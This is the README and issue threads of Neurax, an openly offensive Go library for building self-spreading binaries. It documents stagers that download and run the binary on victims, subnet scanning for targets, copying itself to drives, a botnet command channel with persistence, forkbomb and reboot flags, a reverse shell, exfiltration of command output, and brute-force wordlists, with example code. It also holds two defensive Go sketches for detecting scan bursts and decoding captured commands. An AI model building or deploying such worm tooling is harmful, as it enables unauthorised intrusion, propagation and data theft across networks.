A framework for constructing self-spreading binaries



A framework that aids in creation of self-spreading software


go get -u github.com/redcode-labs/Coldfire

go get -u github.com/yelinaung/go-haikunator

New in v. 2.0

  • New wordlist mutators + common passwords by country
  • Improvised passive scanning
  • .FastScan option that makes active scans a bit quicker
  • Wordlists are created strictly in-memory
  • NeuraxScan() accepts a callback function instead of channel as an argument.
  • NeuraxScan() scans in infinite loop with possibility to set interval between each scan of whole subnet/pool of targets
  • Reverse-DNS lookup for targets that are not in IP format
  • Extraction of target candidates from ARP cache
  • Possibility to scan only a selected list of targets + prioritizing specific targets (such as default gateways)
  • Possibility to specify interface and timeout when using passive network scan.
  • Improved command stager (can be optionally executed with elevated privileges / multiple times)
  • A few option names were changed
  • NeuraxConfig. became N. (because it's shorter to type)
  • Functions for random memory allocation + binary migration
  • Possibility to chain multiple stagers (ex. wget + curl)
  • Volume and complexity of created wordlist can be easily tuned (with options such as .WordlistExpand)
  • Possibility to set time-to-live of created binary


With the help of Neurax, Golang binaries can spread on a local network without using any external servers.

Diverse config options and command stagers allow rapid propagation across various wireless environments.

Example code

package main
import . "github.com/redcode-labs/Neurax"

func main(){

  //Specify serving port and stager to use
  N.Port = 5555
  N.Stager = "wget"

  //Start a server that exposes the current binary in the background
  go NeuraxServer()
  //Copy current binary to all logical drives

  //Create a command stager that should be launched on target machine
  //It will download, decode and execute the binary
  cmd_stager := NeuraxStager()

  /* Now you have to somehow execute the command generated above.
     You can use SSH bruteforce, some RCE or whatever else you want ;> */

}

List of config entries

| Name | Description | Default value |
| --- | --- | --- |
| N.Stager | Name of the command stager to use | random, platform-compatible |
| N.StagerSudo | If true, Linux cmd stagers are executed with elevated privileges | false |
| N.StagerRetry | Number of times to re-execute the command stager | 0 |
| N.Port | Port to serve on | 6741 |
| N.Platform | Platform to target | detected automatically |
| N.Path | The path under which binary is saved on the host | random |
| N.FileName | Name under which downloaded binary should be served and then saved | random |
| N.Base64 | Encode the transferred binary in base64 | false |
| N.CommPort | Port that is used by binaries to communicate with each other | 7777 |
| N.CommProto | Protocol for communication between nodes | "udp" |
| N.ReverseListener | Contains " : " of remote reverse shell handler | not specified |
| N.ReverseProto | Protocol to use for reverse connection | "udp" |
| N.ScanRequiredPort | NeuraxScan() treats host as active only when it has a specific port opened | none |
| N.ScanPassive | NeuraxScan() detects hosts using passive ARP traffic monitoring | false |
| N.ScanPassiveTimeout | NeuraxScan() monitors ARP layer this amount of seconds | 50 seconds |
| N.ScanPassiveIface | Interface to use when scanning passively | default |
| N.ScanActiveTimeout | NeuraxScan() sets this value as timeout for scanned port in each thread | 2 seconds |
| N.ScanPassiveAll | NeuraxScan() captures packets on all found devices | false |
| N.ScanPassiveNoArp | Passive scan doesn't set strict ARP capture filter | false |
| N.ScanFirst | A slice containing IP addresses to scan first | []string{} |
| N.ScanFirstOnly | NeuraxScan() scans only hosts specified within .ScanFirst | false |
| N.ScanArpCache | NeuraxScan() scans first the hosts found in local ARP cache. Works only with active scan | false |
| N.ScanCidr | NeuraxScan() scans this CIDR | local IP + "/24" |
| N.ScanThreads | Number of threads to use for NeuraxScan() | 10 |
| N.ScanFullRange | NeuraxScan() scans all ports of target host to determine if it is active | from 19 to 300 |
| N.ScanInterval | Time interval to sleep before scanning whole subnet again | "2m" |
| N.ScanHostInterval | Time interval to sleep before scanning next host in active mode | "none" |
| N.ScanGatewayFirst | Gateway is the first host scanned when active scan is used | false |
| N.Verbose | If true, all error messages are printed to STDOUT | false |
| N.Remove | When any errors occur, binary removes itself from the host | false |
| N.PreventReexec | If true, when any command matches with those that were already received before, it is not executed | true |
| N.ExfilAddr | Address to which output of command is sent when 'v' preamble is present. | none |
| N.WordlistExpand | NeuraxWordlist() performs non-standard transformations on input words | false |
| N.WordlistCommon | Prepend 20 most common passwords to wordlist | false |
| N.WordlistCommonNum | Number of common passwords to use | all |
| N.WordlistCommonCountries | A map[string]int that contains country codes and number of passwords to use | map[string]int |
| N.WordlistMutators | Mutators to use when .WordlistExpand is specified | {"single_upper", "cyryllic", "encapsule"} |
| N.WordlistPermuteNum | Maximum length of permutation generated by NeuraxWordlistPermute() | 2 |
| N.WordlistPermuteSeparator | A separator character to use for permutations | "-" |
| N.WordlistShuffle | Shuffle generated wordlist before returning it | false |
| N.AllocNum | This entry defines how many times NeuraxAlloc() allocates random memory | 5 |
| N.Blacklist | Slice that contains IP addresses that are excluded from any type of scanning | []string{} |
| N.FastHTTP | HTTP request in IsHostInfected() is performed using fasthttp library | false |
| N.Debug | Enable debug messages | false |

Finding new targets

Function NeuraxScan(func(string)) enables detection of active hosts on the local network. Its only argument is a callback function that is called in the background for every active host. A host is treated as active when it has at least 1 open port, is not already infected, and fulfills the conditions specified within N.

NeuraxScan() runs as infinite loop - it scans whole subnet specified by .Cidr config entry and when every host is scanned, function sleeps for an interval given in .ScanInterval.
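
Seen from the defending side, the scan-then-sleep loop described above shows up in flow logs as bursts of probes to many hosts, separated by a steady pause. The Go sketch below is an added example, not part of Neurax; the Flow record shape, the thresholds and all addresses are constructed assumptions.

```go
package main

import "fmt"

// Flow is a minimal connection record (hypothetical shape); TS is in seconds.
type Flow struct {
	TS       int64
	Src, Dst string
}

// Sweep is one burst that reached Hosts distinct addresses; Pause is the idle
// time since the previous sweep ended (0 for the first one).
type Sweep struct{ Start, End, Hosts, Pause int64 }

// Sweeps groups src's time-sorted flows into bursts separated by more than
// idleGap seconds and keeps the bursts that reached at least minHosts targets.
func Sweeps(flows []Flow, src string, idleGap, minHosts int64) (out []Sweep) {
	var start, last int64
	seen := map[string]bool{}
	flush := func() {
		if n := int64(len(seen)); n >= minHosts {
			s := Sweep{Start: start, End: last, Hosts: n}
			if len(out) > 0 {
				s.Pause = start - out[len(out)-1].End
			}
			out = append(out, s)
		}
		seen = map[string]bool{}
	}
	for _, f := range flows {
		if f.Src != src {
			continue
		}
		if len(seen) > 0 && f.TS-last > idleGap {
			flush()
		}
		if len(seen) == 0 {
			start = f.TS
		}
		seen[f.Dst], last = true, f.TS
	}
	flush()
	return out
}

// SampleFlows is constructed data: one host sweeps 20 addresses twice with a
// 120 s pause (the "2m" default above); another makes one ordinary connection.
func SampleFlows() (fl []Flow) {
	for _, base := range []int64{0, 139} {
		for h := int64(0); h < 20; h++ {
			fl = append(fl, Flow{base + h, "10.0.0.50", fmt.Sprintf("10.0.0.%d", h+1)})
		}
	}
	return append(fl, Flow{300, "10.0.0.9", "10.0.0.1"})
}

func main() {
	fmt.Println(Sweeps(SampleFlows(), "10.0.0.50", 30, 10))
}
```

A Pause that repeats with little variation across sweeps is the signal worth alerting on; idleGap has to stay below the pause being looked for.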

Disks infection

A Neurax binary doesn't have to copy itself using wireless means. Function NeuraxDisks() copies the current binary (under a non-suspicious name) to all logical drives that were found. The copied binary is not executed, but simply resides in its destination waiting to be run. NeuraxDisks() returns an error if the list of disks cannot be obtained or copying to any destination was impossible.

Another function, NeuraxZIP(num_files int) err, creates a randomly named .zip archive containing the current binary. It is saved in the current directory and contains up to num_files random files.

NeuraxZIPSelf() simply zips the current binary, creating an archive holding the same name.

Synchronized command execution

Function NeuraxOpenComm() (launched as goroutine) allows binary to receive and execute commands. It listens on port number specified in .CommPort using protocol defined in .CommProto. Field .CommProto can be set either to "tcp" or "udp". Commands that are sent to the port used for communication are executed in a blind manner - their output isn't saved anywhere.

An optional preamble can be added before the command string.

Format: :

Example command with preamble might look like this: :ar echo "pwned"

Following characters can be specified inside preamble:

  • a - received command is forwarded to each infected node, but the node that first received the command will not execute it
  • x - received command will be executed even if a is specified
  • r - after receiving the command, binary removes itself from infected host and quits execution
  • k - keep preamble when sending command to other nodes
  • s - sleep random number of seconds between 1 and 5 before executing command
  • q - after command is executed, the machine reboots
  • o - command is sent to a single, random node. a must be specified
  • v - output of executed command is sent to an address specified under .ExfilAddr
  • m - mechanism that prevents re-execution of commands becomes disabled just for this specific command
  • l - command is executed in infinite loop
  • e - command is executed only if the node has elevated privileges
  • p - command becomes persistent and is executed upon each startup
  • d - output of executed command is printed to STDOUT for debugging purpose
  • f - forkbomb is launched after command was executed
  • ! - if command was executed with errors and a is specified, this command is not forwarded

By default, raw command sent without any preambles is executed by a single node that the command was addressed for.

It is also important to note that when k is not present inside preamble, preamble is removed from command right after the first node receives it.

Example 1 - preamble is not forwarded to other nodes:

 (1) [TCP_client]    ":ar whoami" -----> [InfectedHost1] 
 (2) [InfectedHost1] "whoami"     -----> [InfectedHostN]
    [InfectedHost1] removes itself after command was sent to all infected nodes in (2)
     because "r" was specified in preamble. "x" was not specified, so "whoami" was not executed by [InfectedHost1] 

Example 2 - preamble is forwarded:

 (1) [TCP_client]    ":akxr whoami"  -----> [InfectedHost1] 
 (2) [InfectedHost1] ":akxr whoami"  -----> [InfectedHostN]
 (n) [InfectedHostN] ":axkr whoami"  -----> ...............
 .................................   -----> ...............

 Both [InfectedHost1] and [InfectedHostN] execute the command and try to send it to other nodes with the preamble preserved
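
For an analyst who has captured traffic on the comm port, the flag list and the two examples above are enough to decode what a payload asks a node to do. The following Go decoder is an added example and not part of Neurax; it assumes the preamble is ':' followed by flag letters and ended by the first space, as in ":ar whoami", and its type and function names are hypothetical.

```go
package main

import (
	"fmt"
	"strings"
)

// Finding is the triage view of one payload captured on the comm port.
type Finding struct {
	Flags           string   // preamble letters as received, "" if none
	Command         string   // command with the preamble stripped
	Propagates      bool     // 'a': forwarded to the other nodes
	ExecutesLocally bool     // no 'a', or 'x' present
	KeepsPreamble   bool     // 'k': forwarded copies keep the flags
	Notes           []string // response-relevant side effects
}

// Side effects that change response priority, worded after the flag list.
var impact = map[rune]string{
	'r': "node deletes itself after receipt: image the host first",
	'q': "host reboots after execution: volatile evidence is lost",
	'v': "output is sent to the configured exfil address",
	'p': "command persists across startups",
	'l': "command runs in an infinite loop",
	'f': "forkbomb follows execution",
}

const knownFlags = "axrksqovmledpf!" // every character in the flag list above

// DecodePayload splits a payload into preamble and command. Assumption: the
// preamble is ':' plus flag letters, ended by the first space (":ar whoami").
func DecodePayload(payload string) Finding {
	p := strings.TrimSpace(payload)
	f := Finding{Command: p}
	if strings.HasPrefix(p, ":") {
		f.Flags, f.Command, _ = strings.Cut(p[1:], " ")
	}
	for _, c := range f.Flags {
		if !strings.ContainsRune(knownFlags, c) {
			f.Notes = append(f.Notes, fmt.Sprintf("unknown flag %q", c))
		} else if note, ok := impact[c]; ok {
			f.Notes = append(f.Notes, note)
		}
	}
	f.Propagates = strings.Contains(f.Flags, "a")
	f.KeepsPreamble = strings.Contains(f.Flags, "k")
	f.ExecutesLocally = !f.Propagates || strings.Contains(f.Flags, "x")
	if f.Command == "purge" {
		f.Notes = append(f.Notes, "purge: every node relays it, self-deletes and exits")
	}
	return f
}

func main() {
	// Constructed sample payloads, modelled on the examples above.
	for _, s := range []string{":ar whoami", ":akxr whoami", "whoami", "purge"} {
		fmt.Printf("%-16q %+v\n", s, DecodePayload(s))
	}
}
```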

Reverse connections

An interactive reverse shell can be established with NeuraxReverse(). It receives commands from the host specified in .ReverseListener in the form " : ". The protocol is defined by .ReverseProto. If NeuraxOpenComm() was started before calling this function, each command behaves as described in the section above. If it was not, commands are executed locally.

Note: this function should also be run as a goroutine to prevent blocking caused by the infinite loop used for receiving.

Cleaning up

Whenever "purge" command is received by a node, it resends this command to all other nodes, removes itself from host and quits. This behaviour can be also commenced using NeuraxPurge() executed somewhere in the source.

Wordlist creation

If the spread vector of your choice is based on some kind of brute force, it is good to have a proper wordlist prepared. Storing words in a text file on the client side isn't really effective, so you can mutate a basic wordlist using NeuraxWordlist(...words) []string. To permute a set of given words, use NeuraxWordlistPermute(...words) []string.

Setting time-to-live

If you want your binary to remove itself after a given time, use NeuraxSetTTL() at the beginning of your code. This function should be launched as a goroutine. For example:

go NeuraxSetTTL("2m")

will make the binary run NeuraxPurgeSelf() after 2 minutes from initial execution.

Using multiple stagers at once

If you would like to chain all stagers available for given platform, set .Stager to "chain".

Moving the dropped binary

If you need to copy the binary after initial execution, use NeuraxMigrate(path string). It will copy the binary under path, remove current binary and execute newly migrated one.

Support this tool

If you like this project and want to see it grow, please consider making a small donation :>


This software is under MIT license

  • goferish refactor and fixes

    Changes and fixes.

    • Introduce struct to be instantiated,
    • Add methods on pointer receiver,
    • Fix the number of slices allocations to the bare minimum,
    • Naming according to go standards,
    • Remove naming redundancy (neurax.NeuraxXXX -> neurax.XXX),
    • Introduce default config,
    • allow for context passing and safe server shutdown,
    • allow for safe goroutine closing (some of them, more goroutines needs a context for safe exit),
    • removed pythonic ideas (clunked the code unnecessarily), pythonic ideas work well for small prototype projects, not for reusable, well-performing, testable, and safe code.

    I would like to refactor more but not in one go.

    Please if there is anything that is somehow unclear I would be happy to clarify this. I think this library may have great potential but needs some architecture changes. This isn't easy when building things from scratch.

    opened by bartossh 2
  • Make it gopherish

    Before starting with any new feature I would like to clear and reorganize the code a little bit, so it would be more GO like and less C/Python like. I don't want to impose my point of view or criticize as the whole idea and code looks handcrafted. This is well done but rather lacks gopher polish. I am afraid it can make adding new features hard and clunky. But with a few fixes, I think it can make it testable, organize it in a way that the package will depend on abstraction rather than on implementation. Then it will be able to decouple some parts and focus on improving performance if needed. The success of the package lies in how easy it feels for developers to write code without all the time referring to the documentation.

    I would propose to start from the simplest and then go for the hardest:

    • Make a feature branch so the above can be worked on independently not blocking any development.
    • Rewrite names (func, vars, definitions and docs) to be written according to GO standard.
    • Restructure code so public dependencies are well documented and depend on abstraction rather than on implementation so the package user may inject its own custom solution or we may provide more than one implementation available in easy to use way.
    • Write tests and benchmarks.
    • Each step will have a separate branch rooted from the feature branch.
    • Feature branch will be then merged to the main branch after the whole feature is accepted.


    This project is still in the early stage of development and has potential. After decoupling some logic we may know which part needs improvement. This will unlock more possibilities for the package user. This will allow creating smaller binaries as the package user will have more freedom in choosing what goes to the project she/he is working on.

    Please let me know if and how it is possible.

    Thanks. 👍 job.

    opened by bartossh 1
  • Feature ideas

    As already said in the other repository I'm very intrigued by your projects and adding Golang to my skillset now, after getting annoyed with Paramiko in Python. Did you limit the scanning feature on purpose on the /24 cidr or is an improvement to scan outside of the local network already in planning? Also I'm curious what you think about fileless self replicating code, only loaded and executed in RAM. Is that even possible with Go?

    opened by TormentedSoul666 3
Red Code Labs
Finest tooling for advanced adversarial simulations